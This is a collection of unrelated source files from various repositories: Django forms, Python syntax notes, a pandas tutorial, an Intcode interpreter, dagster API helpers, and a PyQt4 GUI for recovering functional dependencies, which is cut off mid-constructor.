arseni2/djangoblog
|
76922d4abd7550bfb8a9b0514eda727699e57e37
|
b3b8e1a30c4f2860719d62736571e6aa4d0258df
|
refs/heads/main
| 2023-03-23T07:27:43.091875
| 2021-03-20T22:41:16
| 2021-03-20T22:41:16
| 346,117,170
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 481
|
py
|
from django import forms
from django.contrib.auth.forms import UserCreationForm, UserChangeForm
from django.contrib.auth import get_user_model
CustomUser = get_user_model()
class CustomUserCreationForm(UserCreationForm):
    """Sign-up form for the project's custom user model, adding age and email."""
    class Meta(UserCreationForm.Meta):
        model = CustomUser
        # Extend the stock fields (username + password pair) with the custom columns.
        fields = UserCreationForm.Meta.fields+('age','email')
class CustomUserChangeForm(UserChangeForm):
    """Edit form for the custom user model, reusing the stock field set."""
    class Meta:
        # NOTE(review): UserChangeForm.Meta.fields exposes the parent's field
        # selection unchanged -- confirm it covers the custom columns as intended.
        model = CustomUser
        fields = UserChangeForm.Meta.fields
|
[
"arc-37@mail.ru"
] |
arc-37@mail.ru
|
0a7dc15098a11e2585324fc2d0969841cf17bb22
|
f77b2c4b5808c360e8644644b0b3dba401ed3682
|
/random_games/python_syntax.py
|
1c3841b39cc9283bd72db28c63247c12c7a8bb21
|
[] |
no_license
|
616049195/random_junks
|
6a29393b7fcdb9b8968ff252446380effd629216
|
c616a29b1a0025f3451870ed660e28b81126e97e
|
refs/heads/master
| 2021-01-16T21:00:47.286799
| 2013-11-23T23:42:22
| 2013-11-23T23:42:22
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,645
|
py
|
"""
Python syntax...
"""
# list comprehension
## syntax
new_list = [x for x in range(1,6)]
# => [1, 2, 3, 4, 5]
##
## examples
even_squares = [x**2 for x in range(1,11) if (x)%2 == 0]
##
# dictionary
my_dict = {
'name' : "Hyunchel",
'age' : 23,
'citizenship' : "Republic of Korea"
}
print my_dict.keys()
print my_dict.values()
for key in my_dict:
print key, my_dict[key]
#
# list slicing
## syntax
[start:end:stride]
same with range() syntax.
[inclusive: exclusive: inclusive]
# if you omit, you can default value [first:last:1]
# negative values change direction (reverse...)
##
l = [i ** 2 for i in range(1, 11)]
# Should be [1, 4, 9, 16, 25, 36, 49, 64, 81, 100]
print l[0:9:2]
## omitting
my_list = range(1, 11) # List of numbers 1 - 10
# Add your code below!
print my_list[::2]
##
## reverseing
my_list = range(1, 11)
# Add your code below!
backwards = my_list[::-1]
print backwards
##
# lambda
## syntax
# lambda variable: expression
##
squares = [x**2 for x in range(1, 11)]
print filter(lambda x: x >= 30 and x <= 70, squares)
#
## file i/o
#----__enter__() and __exit__() invocation "with" and "as" syntax
#syntax
with open("file", "mode") as variable:
# Read or write to the file
#
#### "variable" is created for good. it can be used after the statement. ###
#examples
with open("text.txt", "w") as textfile:
textfile.write("Success!")
#
#_---- File's memeber variable "closed" is set to True/False depending the file's open status
with open("text.txt", "r+") as my_file:
my_file.write("HONEY")
if not my_file.closed:
my_file.close()
print my_file.closed
#
##
|
[
"hyunchelkk@gmail.com"
] |
hyunchelkk@gmail.com
|
0a6cac0a18fbccdf78c9aa59c0e8286c8bfe542c
|
4bf45827230011d8417ff797fe97b946921abaa3
|
/starfish/core/intensity_table/test/test_synthetic_intensities.py
|
6f35cb355c0e13c9e0b699f06bd4270a550c3905
|
[
"MIT"
] |
permissive
|
kne42/starfish
|
713eb9666c29d89b6d0b25ee36b63761c15de336
|
78b348c9756f367221dcca725cfa5107e5520b33
|
refs/heads/master
| 2020-04-19T19:41:37.736938
| 2019-07-18T00:14:16
| 2019-07-18T00:14:16
| 168,395,751
| 0
| 0
|
MIT
| 2019-09-24T02:38:16
| 2019-01-30T18:45:42
|
Python
|
UTF-8
|
Python
| false
| false
| 1,665
|
py
|
"""
Tests for IntensityTable.synthetic_intensities method.
"""
import numpy as np
from starfish.core.codebook.test.factories import codebook_array_factory
from starfish.core.types import Axes, Features
from ..intensity_table import IntensityTable
def test_synthetic_intensity_generation():
    """
    Create a 2-spot IntensityTable of pixel size (z=3, y=4, x=5) from a codebook with 3 channels
    and 2 rounds.

    Verify that the constructed Synthetic IntensityTable conforms to those dimensions, and given
    a known random seed, that the output spots decode to match a target in the input Codebook
    """
    # set seed to check that codebook is matched. This seed generates 2 instances of GENE_B
    # (the exact np.where() pattern asserted below depends on this seed value).
    np.random.seed(2)
    codebook = codebook_array_factory()
    num_z, height, width = 3, 4, 5
    intensities = IntensityTable.synthetic_intensities(
        codebook,
        num_z=num_z,
        height=height,
        width=width,
        n_spots=2,
    )
    # sizes should match codebook
    assert intensities.sizes[Axes.ROUND] == 2
    assert intensities.sizes[Axes.CH] == 3
    assert intensities.sizes[Features.AXIS] == 2
    # attributes should be bounded by the specified size
    assert np.all(intensities[Axes.ZPLANE.value] <= num_z)
    assert np.all(intensities[Axes.Y.value] <= height)
    assert np.all(intensities[Axes.X.value] <= width)
    # both codes should match GENE_B
    assert np.array_equal(
        np.where(intensities.values),
        [[0, 0, 1, 1],  # two each in feature 0 & 1
         [1, 2, 1, 2],  # one each in channel 1 & 2
         [1, 0, 1, 0]],  # channel 1 matches round 1, channel 2 matches round zero
    )
|
[
"noreply@github.com"
] |
noreply@github.com
|
f76e193dc89f82660d667f368bb4936852252bc2
|
29e8e04876b8cf03dd8755ad1d085a755d3f4061
|
/venv/bin/chardetect
|
f3f63f7830033730f7309d96f51b19c34c7b028a
|
[
"MIT"
] |
permissive
|
haideraltahan/CropMe
|
431d213f2163c08579415bf3fc7708366ccd2d78
|
75a111b9d3b2c50c6f2a9a36d21432053f02284d
|
refs/heads/master
| 2020-05-30T07:37:18.713374
| 2019-05-31T20:15:19
| 2019-05-31T20:15:19
| 189,601,563
| 3
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 251
|
#!/home/haider/Desktop/CropMe/venv/bin/python
# -*- coding: utf-8 -*-
# Console-script shim generated by pip/setuptools for the `chardetect` entry point.
import re
import sys
from chardet.cli.chardetect import main
if __name__ == '__main__':
    # Normalize argv[0]: strip a trailing '-script.py(w)' or '.exe' so usage/help
    # output shows the bare command name (Windows launcher convention).
    sys.argv[0] = re.sub(r'(-script\.pyw?|\.exe)?$', '', sys.argv[0])
    sys.exit(main())
|
[
"haideraltahan@gmail.com"
] |
haideraltahan@gmail.com
|
|
674a79a4698a5728e4c44718119f31a8b7728fc8
|
11595170c7b0d51505dabb3e330df875a95093c5
|
/RPCHitAnalyzer/WorkDir/getFileName.py
|
1349eb408ec0595606e17aceead6bf65a29a5488
|
[] |
no_license
|
ggrenier/CMSusercode
|
61d7e7ee25f7a0a68f48011d8ad798e85ea8a8a8
|
a90320daf8be5d1c2b448256b3e3fb0d907eb051
|
refs/heads/master
| 2021-01-10T11:23:20.668795
| 2016-03-11T13:46:34
| 2016-03-11T13:46:34
| 53,138,550
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,112
|
py
|
# Special dictionary keys understood by generateFileName:
#   'directory' -- output directory (default '../Data/')
#   'startName' -- file-name prefix (default 'SingleMu_upscope')
#   'extension' -- file suffix (default '.root')
#   'nevents'   -- appended last, just before the extension
# Every other key is appended, sorted alphabetically, as '_<key><value>'.
def generateFileName(paramsBydict):
    """Build a data-file path from a parameter dictionary (see key list above)."""
    special = ('directory', 'startName', 'nevents', 'extension')
    filename = paramsBydict.get('directory', '../Data/')
    filename += paramsBydict.get('startName', 'SingleMu_upscope')
    # Deterministic ordering: sorted keys make the name reproducible.
    for key in sorted(paramsBydict):
        if key not in special:
            filename += '_' + key + str(paramsBydict[key])
    if 'nevents' in paramsBydict:
        filename += '_' + str(paramsBydict['nevents'])
    filename += str(paramsBydict.get('extension', '.root'))
    return filename
if __name__ == "__main__":
a=dict()
a['Pt']=60
a['zvtx']=30
a['etamin']=2.3
a['nevents']=1000
print generateFileName(a)
|
[
"grenier@ipnl.in2p3.fr"
] |
grenier@ipnl.in2p3.fr
|
c74d3d817ada2bcf2794d7cffebfb2b3ccbf0e02
|
23a3c76882589d302b614da5f4be0fc626b4f3cd
|
/python_modules/dagster/dagster/api/snapshot_trigger.py
|
d9414b7c2318bcc7dc7ca624569ba3ba47f8ef8b
|
[
"Apache-2.0"
] |
permissive
|
DavidKatz-il/dagster
|
3641d04d387cdbe5535ae4f9726ce7dc1981a8c3
|
7c6d16eb8b3610a21020ecb479101db622d1535f
|
refs/heads/master
| 2022-12-20T13:08:36.462058
| 2020-09-14T18:12:12
| 2020-09-14T22:43:26
| 264,703,873
| 0
| 0
|
Apache-2.0
| 2020-06-16T09:49:00
| 2020-05-17T15:56:57
|
Python
|
UTF-8
|
Python
| false
| false
| 2,276
|
py
|
from dagster import check
from dagster.core.host_representation.external_data import (
ExternalExecutionParamsData,
ExternalExecutionParamsErrorData,
)
from dagster.core.host_representation.handle import RepositoryHandle
from dagster.core.types.loadable_target_origin import LoadableTargetOrigin
from dagster.grpc.types import ExternalTriggeredExecutionArgs
from .utils import execute_unary_api_cli_command
def sync_get_external_trigger_execution_params(instance, repository_handle, trigger_name):
    """Resolve a trigger's execution params by invoking the repository's CLI in a subprocess.

    Returns ExternalExecutionParamsData on success, or
    ExternalExecutionParamsErrorData when the user-code side raised.
    """
    check.inst_param(repository_handle, "repository_handle", RepositoryHandle)
    check.str_param(trigger_name, "trigger_name")
    origin = repository_handle.get_origin()
    return check.inst(
        execute_unary_api_cli_command(
            origin.executable_path,
            "trigger_execution_params",
            ExternalTriggeredExecutionArgs(
                repository_origin=origin,
                instance_ref=instance.get_ref(),
                trigger_name=trigger_name,
            ),
        ),
        (ExternalExecutionParamsData, ExternalExecutionParamsErrorData),
    )
def sync_get_external_trigger_execution_params_ephemeral_grpc(
instance, repository_handle, trigger_name
):
from dagster.grpc.client import ephemeral_grpc_api_client
origin = repository_handle.get_origin()
with ephemeral_grpc_api_client(
LoadableTargetOrigin(executable_path=origin.executable_path)
) as api_client:
return sync_get_external_trigger_execution_params_grpc(
api_client, instance, repository_handle, trigger_name
)
def sync_get_external_trigger_execution_params_grpc(
api_client, instance, repository_handle, trigger_name
):
check.inst_param(repository_handle, "repository_handle", RepositoryHandle)
check.str_param(trigger_name, "trigger_name")
origin = repository_handle.get_origin()
return check.inst(
api_client.external_trigger_execution_params(
external_triggered_execution_args=ExternalTriggeredExecutionArgs(
repository_origin=origin,
instance_ref=instance.get_ref(),
trigger_name=trigger_name,
)
),
(ExternalExecutionParamsData, ExternalExecutionParamsErrorData),
)
|
[
"prha@elementl.com"
] |
prha@elementl.com
|
8b5bdf81def59b8f6930c4ce22ec1874049a0005
|
8d91f8867fb5b72ca257d9e7152188914154ccd1
|
/pune/controllers/admin/user.py
|
4c97fbd2cff00fce7bec04ce0a205ce7b77a0945
|
[] |
no_license
|
liwushuo/pune
|
c6420e9a3f65711cc7a6c578720122e5b7f53eb9
|
23eae59fc3d3515903700740fade1bce8b8d6e12
|
refs/heads/master
| 2021-01-10T08:10:41.056344
| 2016-04-18T08:45:01
| 2016-04-18T08:45:01
| 53,919,940
| 2
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 331
|
py
|
# -*- coding: utf-8 -*-
from flask import render_template
from flask import request
from flask import redirect
from flask import url_for
from flask import abort
from flask import flash
from flask import current_app
from pune.service import UserService
from . import bp
@bp.route('/usrs')
def list_users():
return 'nothing'
|
[
"maplevalley8@gmail.com"
] |
maplevalley8@gmail.com
|
66c87d7d3d6df618eec5985290c9a5d2ba36eb39
|
dfaa090887158b35fc19b7274593d78f44658399
|
/Django/mysite9/mysite9/wsgi.py
|
d39d3ab985c3049db075b08a7e9ef7f117e2bb29
|
[] |
no_license
|
Artak2033/Homeworks
|
429c3f5896b6eea52bc6dc7161916afce5d6bd91
|
dbb526ac6ae082b58e58f6204b2106b9ccaf7f58
|
refs/heads/main
| 2023-05-15T14:39:41.992105
| 2021-06-11T12:40:36
| 2021-06-11T12:40:36
| 365,962,275
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 391
|
py
|
"""
WSGI config for mysite9 project.
It exposes the WSGI callable as a module-level variable named ``application``.
For more information on this file, see
https://docs.djangoproject.com/en/3.2/howto/deployment/wsgi/
"""
import os
from django.core.wsgi import get_wsgi_application
os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'mysite9.settings')
application = get_wsgi_application()
|
[
"akfartak@mail.ru"
] |
akfartak@mail.ru
|
2b8a1159ab224c44e934263a6b9f5090c89352a0
|
47901d3483df111fe9b6f146691e58eecfa09c32
|
/13/intcode.py
|
6254b3853bf9397655b39b018240b3c0a8030a43
|
[] |
no_license
|
matus-pikuliak/advent_2019
|
1861ee4da7c01e038c80eeee1e03353f9907447f
|
67fcf18f66e53e886f945a5cdd7289b9439483db
|
refs/heads/master
| 2020-09-22T10:05:52.879745
| 2019-12-25T19:59:09
| 2019-12-25T19:59:09
| 225,149,977
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,095
|
py
|
class IntCode:
def __init__(self, memory):
self.mem = memory + [0] * 1000
self.pointer = 0
self.rel = 0
def run(self):
while True:
current = f'{self.mem[self.pointer]:05}'
instruction = current[-2:]
if instruction == '99':
break
modes = [
int(mode)
for mode
in current[2::-1]]
ops = []
for i in range(3):
adr = self.pointer + i + 1
if modes[i] == 0:
ops.append(self.mem[adr])
if modes[i] == 1:
ops.append(adr)
if modes[i] == 2:
ops.append(self.mem[adr] + self.rel)
if instruction == '01':
self.mem[ops[2]] = self.mem[ops[0]] + self.mem[ops[1]]
self.pointer += 4
if instruction == '02':
self.mem[ops[2]] = self.mem[ops[0]] * self.mem[ops[1]]
self.pointer += 4
if instruction == '03':
self.mem[ops[0]] = yield -999
yield
self.pointer += 2
if instruction == '04':
yield self.mem[ops[0]]
self.pointer += 2
if instruction == '05':
if self.mem[ops[0]] != 0:
self.pointer = self.mem[ops[1]]
else:
self.pointer += 3
if instruction == '06':
if self.mem[ops[0]] == 0:
self.pointer = self.mem[ops[1]]
else:
self.pointer += 3
if instruction == '07':
self.mem[ops[2]] = int(self.mem[ops[0]] < self.mem[ops[1]])
self.pointer += 4
if instruction == '08':
self.mem[ops[2]] = int(self.mem[ops[0]] == self.mem[ops[1]])
self.pointer += 4
if instruction == '09':
self.rel += self.mem[ops[0]]
self.pointer += 2
|
[
"matus.pikuliak@stuba.sk"
] |
matus.pikuliak@stuba.sk
|
b7c6a2da8d1c2ae74e8a0066ec371a381e31082e
|
cba3d1dd5b08a703c7e9e68464beb741eacfeb0d
|
/003_Pandas_tut.py
|
ca014206033cd06400a9a4ed2d444c451e86699b
|
[] |
no_license
|
Fizztech0/Tutorials
|
480b8973deee83ea19ad197761f5bf1e21c4a169
|
dff855b63834507783494543d0c8d3240d0bf145
|
refs/heads/main
| 2023-06-26T21:51:18.522576
| 2021-07-23T18:53:35
| 2021-07-23T18:53:35
| 388,511,432
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 4,046
|
py
|
# Dataframe is the Object type that Pandas allows to manipulate
import sys
sys.path.append("/Users/SafetyFirst/Library/Python/3.9/lib/python/site-packages")
# import as = dont have to type pandas everytime, but just pd
import pandas as pd
import numpy as np
# together with importing numpy these four lines of code allow for a wider pycharm terminal output when displaying
# dataframe content
desired_width=320
pd.set_option('display.width', desired_width)
np.set_printoptions(linewidth=desired_width)
pd.set_option('display.max_columns',13)
pd.set_option('display.max_rows', None)
df = pd.read_csv('003_pokemon_data.csv')
#print(df.head(5))
# Reading Data in Pandas
## Read Headers
#print(df.columns)
## Read each Column
#print(df['Name'][0:5])
#print(df.Name)
#print(df[['Name', 'HP']][0:5])
## Read each row
#print(df.iloc[1])
#for index, row in df.iterrows():
# print(index, row)
#for index, row in df.iterrows():
# print(index, row['Name'])
#print(df.loc[df['Type 1'] == "Fire"])
## Read a specific location (R, C)
#print(df.iloc[2, 1])
# Sorting/Describing Data
#print(df.describe())
## ascending sorting by name
#print(df.sort_values('Name'))
##descending sorting
#print(df.sort_values('Name', ascending=False))
## sorting through multiple columns, ascending [1 = True, 0 = False] so first column will be sorted ascending
## and the second descending
#print(df.sort_values(['Type 1', 'HP'], ascending=[1,0]))
##Making Chancges to the data
##Adding a column
#df['Total'] = df['HP'] + df['Attack'] + df['Defense'] + df['Sp. Atk'] + df['Sp. Def'] + df['Speed']
#print(df[0:13])
## when adding totals, doublecheck if numbers match!
## , means all columns
#df['Total'] = df.iloc[:, 4:10].sum(axis=1)
#print(df)
## be careful with hardcoding numbers as tables change and that can screw everything up
## -> use variables (i.e. Pythons refractor instead of rename option)
## dropping columns
#print(df.drop(columns=['Legendary', 'Generation']))
## reordering data
## 1 just calling the columns you want
#df['Total'] = df.iloc[:, 4:10].sum(axis=1)
#print(df[['Name', 'Total', 'HP']])
## 2
#df['Total'] = df.iloc[:, 4:10].sum(axis=1)
#cols = list(df.columns)
#df = df[cols[0:4] + [cols[-1]] + cols[4:10]]
#print(df.head(5))
## saving to csv
## saving the modified file with the added total of all pokemon values and new sorting
##index=False, otherwise it would insert a indexing column at the front, which the df already has
## to csv, excel and TAB separated .txt
#df['Total'] = df.iloc[:, 4:10].sum(axis=1)
#cols = list(df.columns)
#df = df[cols[0:4] + [cols[-1]] + cols[4:10]]
#df.to_csv('pokemon_data_modified.csv', index=False)
#df.to_excel('pokemon_data_modified.xlsx', index=False)
#df.to_csv('pokemon_data_modified.txt', index=False, sep='\t')
## Filtering data
## filtering by one spec
#print(df.loc[df['Type 1'] == 'Grass'])
## filtering by two specs
## in pandas we use "&" instead of the "and" we'd normally use
## equally "or" is
#new_df = df.loc[(df['Type 1'] == 'Grass') & (df['Type 2'] == 'Poison') & (df['HP'] > 70)]
#print(new_df)
## this will keep the old index, to get rid of it:
#new_df = new_df.reset_index(drop=True)
#select Mega
#new_df.reset_index(drop=True, inplace=True)
#inverse select for non-Mega
#new_df = df.loc[~df["Name"].str.contains('Mega')]
# REGEX segment ommitted
#filtering for either or
#print(df.loc[(df["Type 1"] == "Grass") | (df["Type 1"] == "Fire")])
## Conditional Changes
##changing strings
#df.loc[df["Type 1"] == "Fire", "Type 1"] = "Flamer"
## one condition to set the parameter of another column
#df.loc[df["Type 1"] == "Fire", ["Legendary", "Generation"]] = ["TEST 1", "TEST2"]
## Aggregate Statistics (Groupby)
df['Total'] = df.iloc[:, 4:10].sum(axis=1)
cols = list(df.columns)
df = df[cols[0:4] + [cols[-1]] + cols[4:12]]
#print(df.groupby(["Type 1"]).mean().sort_values("HP", ascending=False))
#print(df.groupby(["Type 1"]).sum())
#print(df.groupby(["Type 1"]).count())
df["count"] = 1
print(df.groupby(["Type 1", "Type 2"]).count()["count"])
#print(df)
|
[
"fizzad@gmail.com"
] |
fizzad@gmail.com
|
52dad76367c862489da289aed0ad49fd4d6a600d
|
b04279709d7133e310cca957f85d9bed259cfbdf
|
/application/settings/develop.py
|
30811838eae0cccaadbe9f5b7702cc17ecb69d46
|
[] |
no_license
|
fujimisakari/otherbu
|
7230de39670815d6d72be13aa293f08a128f13d0
|
d70a0c21858e5d37a3cf3fca81b69ea7f73af661
|
refs/heads/master
| 2022-12-10T17:27:15.411751
| 2019-01-02T18:02:46
| 2019-01-02T18:02:46
| 8,172,410
| 0
| 0
| null | 2022-12-08T00:54:53
| 2013-02-13T03:20:05
|
Python
|
UTF-8
|
Python
| false
| false
| 76
|
py
|
from .base import *
DEBUG = True
TEMPLATE_DEBUG = DEBUG
AUTO_LOGIN = DEBUG
|
[
"fujimisakari@gmail.com"
] |
fujimisakari@gmail.com
|
410f36205d34f73079693b4e026012216b438744
|
459f88ba61bb0200e9906c7ce3c814bdf01bd278
|
/py.py
|
4080d3abf50fdf5ef84cf5c058bddfcf10ff3ffd
|
[] |
no_license
|
iamanx17/Advance-python
|
3c65104997c748c11ff2e322a8665423ca335b34
|
f04baa817667d4d7f628abbefe712f1ea99a3f57
|
refs/heads/main
| 2023-07-07T21:05:38.981879
| 2021-08-12T13:34:33
| 2021-08-12T13:34:33
| 327,520,718
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 139
|
py
|
print('Updating this file from vscode!!')
print('Experiment code 4550')
print('Doing one more change')
print('Lets see what will happen')
|
[
"32339572+iamanx17@users.noreply.github.com"
] |
32339572+iamanx17@users.noreply.github.com
|
2e57626e4bb2e712bdfee4e51a5d28344f6a7fcf
|
3b0ee58fb38780c9a6a81e9c22686adf03e8bdee
|
/publish-events.py
|
9c259eb82b6768103ae81ea1072461a26677961b
|
[] |
no_license
|
gsherwin3/sonic-nas-manifest
|
7061a0f3534c34cfceb612976ccfc789e3b0e43e
|
4c8fe47374d7a65baecb168b2e9ee654761e295d
|
refs/heads/master
| 2020-06-28T21:03:02.069209
| 2016-10-27T16:22:23
| 2016-10-27T16:22:23
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 319
|
py
|
# Python code block to publish events
import cps
import cps_utils
# Create handle to connect to event service
handle = cps.event_connect()
# Create CPS object
obj = cps_utils.CPSObject('base-port/interface',qual='observed', data= {"ifindex":23})
# Publish the event
cps.event_send(handle, obj.get())
|
[
"noreply@github.com"
] |
noreply@github.com
|
8b459ea6c51590e42fb2bdf49298dcfd689e92d7
|
612e80dad0b13450fd647b18301cfe3b7dc707e3
|
/SALab2/window.py
|
971507b85c93b4f9260fc36895032aa7e453dd5e
|
[] |
no_license
|
ozhenchuk/SysAn
|
a44f60367ca47cd10c84d3d02bcd073f3bf4427e
|
06d290b1e963794e156c8bc5870103062d92f574
|
refs/heads/master
| 2020-04-11T20:46:01.557157
| 2018-12-17T06:03:55
| 2018-12-17T06:03:55
| 161,516,342
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 15,537
|
py
|
import matplotlib.pylab as plb
import numpy as np
import sys
import time
##import yaml
from matplotlib.backends.backend_qt4agg import FigureCanvasQTAgg as FigureCanvas
from matplotlib.backends.backend_qt4agg import NavigationToolbar2QT as NavigationToolbar
import matplotlib.pyplot as plt
from iterator import Iterator
from PyQt4 import QtCore, QtGui
import os
class PlotManager(QtGui.QWidget):
def __init__(self, parent=None):
super(PlotManager, self).__init__(parent)
self.figure = plt.figure ()
self.canvas = FigureCanvas(self.figure)
self.toolbar = NavigationToolbar(self.canvas, self)
self.toolbar.hide()
self.zoombut = QtGui.QPushButton("Збільшити")
self.zoombut.clicked.connect(self.zoom)
self.panbut = QtGui.QPushButton("Перемістити")
self.panbut.clicked.connect(self.pan)
self.homebut = QtGui.QPushButton("Повністю")
self.homebut.clicked.connect(self.home)
self.savebut = QtGui.QPushButton("Зберегти")
self.savebut.clicked.connect(self.save)
layout = QtGui.QVBoxLayout()
buttonbox = QtGui.QHBoxLayout()
buttonbox.addWidget(self.zoombut)
buttonbox.addWidget(self.panbut)
buttonbox.addWidget(self.homebut)
buttonbox.addWidget(self.savebut)
layout.addLayout(buttonbox)
layout.addWidget(self.toolbar)
layout.addWidget(self.canvas)
self.setLayout(layout)
self.ax = self.figure.add_subplot(111)
def home(self):
self.toolbar.home()
def zoom(self):
self.toolbar.zoom()
def pan(self):
self.toolbar.pan()
def save(self):
timestr = time.strftime("%Y%m%d_%H%M%S", time.gmtime())
self.figure.savefig(f'{timestr}.png')
class mainWindow(QtGui.QWidget):
def __init__(self, parent = None):
super(mainWindow, self).__init__(parent)
settings = []
##with open("lang_uk.yaml") as f:
##settings.append(yaml.load(f))
self.polinombox = QtGui.QGroupBox("Задання поліномів")
self.setWindowTitle("Відновлення функціональної залежності")
self.lambdabox = QtGui.QGroupBox("Пошук λ")
self.inputbox = QtGui.QGroupBox("Вхідні та вихідні дані")
self.graphicbox = QtGui.QGroupBox("Графіки")
self.samplevolume = QtGui.QSpinBox()
self.samplevolume.setMinimum(1)
self.samplevolume.setMaximum(1000)
self.samplevolume.setValue(45)
self.samplevolume.setAlignment(QtCore.Qt.AlignLeft)
self.samplevolume.setFixedWidth(100)
self.langwin = QtGui.QComboBox()
self.langwin.addItems(["Українська", "English"])
self.langwin.currentIndexChanged.connect(self.LangChange)
self.langwin.setSizePolicy(QtGui.QSizePolicy.Fixed, QtGui.QSizePolicy.Fixed)
langwinlayout = QtGui.QHBoxLayout()
self.langlab = QtGui.QLabel("Мова")
self.langlab.setSizePolicy(QtGui.QSizePolicy.Fixed, QtGui.QSizePolicy.Fixed)
self.langlab.setAlignment(QtCore.Qt.AlignLeft)
langwinlayout.addWidget(self.langlab)
langwinlayout.addWidget(self.langwin)
langwinlayout.insertSpacing(1, 40)
langwinlayout.setAlignment(QtCore.Qt.AlignLeft)
self.filename = []
self.filebuttons = []
captions = ["Файл вхідних даних", "Файл результатів"]
filelayout = []
self.filelables = []
filelablelayout = QtGui.QVBoxLayout()
filefieldslayout = QtGui.QVBoxLayout()
namedefault = ['input_data.txt', 'out_results.txt']
for i in range(2):
self.filename.append(QtGui.QLineEdit(namedefault[i]))
self.filename[i].setFixedWidth(100)
self.filename[i].setAlignment(QtCore.Qt.AlignLeft)
self.filebuttons.append(QtGui.QPushButton("Обрати"))
self.filebuttons[i].setFixedWidth(60)
filelayout.append(QtGui.QHBoxLayout())
filelayout[i].addWidget(self.filename[i])
self.filelables.append(QtGui.QLabel(captions[i]))
self.filelables[i].setAlignment(QtCore.Qt.AlignLeft)
filelablelayout.addWidget(self.filelables[i])
filelayout[i].addWidget(self.filebuttons[i])
filefieldslayout.addLayout(filelayout[i])
QtCore.QObject.connect(self.filebuttons[0], QtCore.SIGNAL("clicked()"), self.selectInputFile)
QtCore.QObject.connect(self.filebuttons[1], QtCore.SIGNAL("clicked()"), self.selectOutputFile)
self.samlable = QtGui.QLabel("Обсяг вибірки")
self.samlable.setAlignment(QtCore.Qt.AlignLeft)
filelablelayout.addWidget(self.samlable)
filefieldslayout.addWidget(self.samplevolume)
datalayout = QtGui.QHBoxLayout()
datalayout.addLayout(filelablelayout)
datalayout.addLayout(filefieldslayout)
datalayout.insertSpacing(1, 20)
databox = QtGui.QWidget()
databox.setLayout(datalayout)
databox.setSizePolicy(QtGui.QSizePolicy.Fixed, QtGui.QSizePolicy.Fixed)
self.vectorbox = QtGui.QGroupBox("Розмірності вхідних векторів")
vectorlayout = QtGui.QHBoxLayout()
vectorxlayout = QtGui.QVBoxLayout()
vectorylayout = QtGui.QVBoxLayout()
dimensiondefaults = [2, 2, 3, 4]
self.dimensions = []
self.dimensionslayout = []
for i in range(3):
self.dimensionslayout.append(QtGui.QHBoxLayout())
self.dimensions.append(QtGui.QSpinBox())
self.dimensions[i].setMinimum(0)
self.dimensions[i].setMaximum(100)
self.dimensions[i].setValue(dimensiondefaults[i])
dimensionlab = QtGui.QLabel("x" + str(i + 1))
dimensionlab.setAlignment(QtCore.Qt.AlignLeft)
self.dimensionslayout[i].addWidget(dimensionlab)
self.dimensionslayout[i].addWidget(self.dimensions[i])
vectorxlayout.addLayout(self.dimensionslayout[i])
self.dimensionslayout.append(QtGui.QHBoxLayout())
self.dimensions.append(QtGui.QSpinBox())
self.dimensions[3].setMinimum(1)
self.dimensions[3].setMaximum(100)
self.dimensions[3].setValue(dimensiondefaults[3])
dimensionlab = QtGui.QLabel("y")
dimensionlab.setAlignment(QtCore.Qt.AlignLeft)
self.dimensionslayout[3].addWidget(dimensionlab)
self.dimensionslayout[3].addWidget(self.dimensions[3])
vectorylayout.addLayout(self.dimensionslayout[3])
for i in range(2):
vectorylayout.addWidget(QtGui.QLabel(""))
vectorlayout.addLayout(vectorxlayout)
vectorlayout.addLayout(vectorylayout)
self.vectorbox.setLayout(vectorlayout)
self.vectorbox.setSizePolicy(QtGui.QSizePolicy.Fixed, QtGui.QSizePolicy.Fixed)
inputlayout = QtGui.QHBoxLayout()
inputlayout.addWidget(databox)
inputlayout.addWidget(self.vectorbox)
self.inputbox.setLayout(inputlayout)
self.polinomdegreebox = QtGui.QGroupBox("Степені поліномів")
self.polinomtype = QtGui.QComboBox()
self.polinomtype.addItems(["Чебишева", "Лежандра", "Лаггера", "Ерміта"])
self.polinomdegree = []
self.polinomdegreelayouts = []
polinomdegreelayout = QtGui.QVBoxLayout()
for i in range(3):
self.polinomdegreelayouts.append(QtGui.QHBoxLayout())
self.polinomdegree.append(QtGui.QSpinBox())
self.polinomdegree[i].setMinimum(0)
self.polinomdegree[i].setValue(3+i)#2*(i+1)+2
polinomdegreelab = QtGui.QLabel("x" + str(i + 1))
self.polinomdegreelayouts[i].addWidget(polinomdegreelab)
self.polinomdegreelayouts[i].addWidget(self.polinomdegree[i])
polinomdegreelayout.addLayout(self.polinomdegreelayouts[i])
self.polinomdegreebox.setLayout(polinomdegreelayout)
polinomlayout = QtGui.QVBoxLayout()
polinomtypelayout = QtGui.QHBoxLayout()
self.polinomlab = QtGui.QLabel("Поліноми")
polinomtypelayout.addWidget(self.polinomlab)
polinomtypelayout.addWidget(self.polinomtype)
polinomtypelayout.insertSpacing(1, 20)
polinomlayout.addLayout(polinomtypelayout)
polinomlayout.addWidget(self.polinomdegreebox)
self.polinombox.setLayout(polinomlayout)
self.lambdamethod = []
self.buttonsys1 = QtGui.QRadioButton("за 1єю системою")
self.lambdamethod.append(self.buttonsys1)
self.buttonsys3 = QtGui.QRadioButton("за 3ма системами")
self.lambdamethod.append(self.buttonsys3)
self.lambdamethod[0].setChecked(True)
lambdamethodlayout = QtGui.QVBoxLayout()
for i in self.lambdamethod:
lambdamethodlayout.addWidget(i)
self.lambdabox.setLayout(lambdamethodlayout)
self.graphics = []
self.graphicstab = QtGui.QTabWidget()
graphiclayout = QtGui.QHBoxLayout()
graphiclayout.addWidget(self.graphicstab)
self.graphicbox.setLayout(graphiclayout)
self.gobutton = QtGui.QPushButton("Розв'язати")
